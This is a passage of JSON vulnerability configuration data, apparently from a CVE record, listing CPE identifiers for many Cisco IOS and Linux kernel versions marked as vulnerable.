                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)se3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(5\\)ca1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)ya1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(6.8\\)t0a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2seb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2se:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)t9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(16\\)bx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)zn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17d\\)sxb10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sxe1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18.2\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)by2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)fy:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(24\\)sv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(31\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)s8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)yb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(6c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)xr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ez:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.0\\(17\\)bt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.0\\(18\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(11b\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(14\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2wa4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(7\\)aa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1cc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(4\\)f1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(10\\)w5\\(18g\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(1\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(1\\)xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\)sl2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\)sl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(20a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(23\\)s2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(25\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(28d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(4\\)xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1\\)db2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0sl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(6b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)xk3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)xf1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)e2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(10c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2za:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)ja:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(6e\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xk4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xg5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(2\\)xb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(1c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3j:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.39:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)xc3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)yd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)ja:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(3a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(2\\)mr1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(2\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(4\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(9d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)ys:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)t8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)yq3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)xr4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)xy6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(5f\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(2\\)t3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(2\\)xb2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(1b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(1\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(9a\\)bc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.99:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.43:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.44:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.60:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.45:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.61:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(11\\)ea1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(18\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(7\\)cx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5c\\)e12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xm7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xg5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)dc2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\)xm4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8b\\)e15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8b\\)e20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1dc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1gb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1yb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)ze:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)t1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12.05\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)yz2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12\\)da3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(10.5\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zh8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sxd7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)so4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)se:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)ewa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
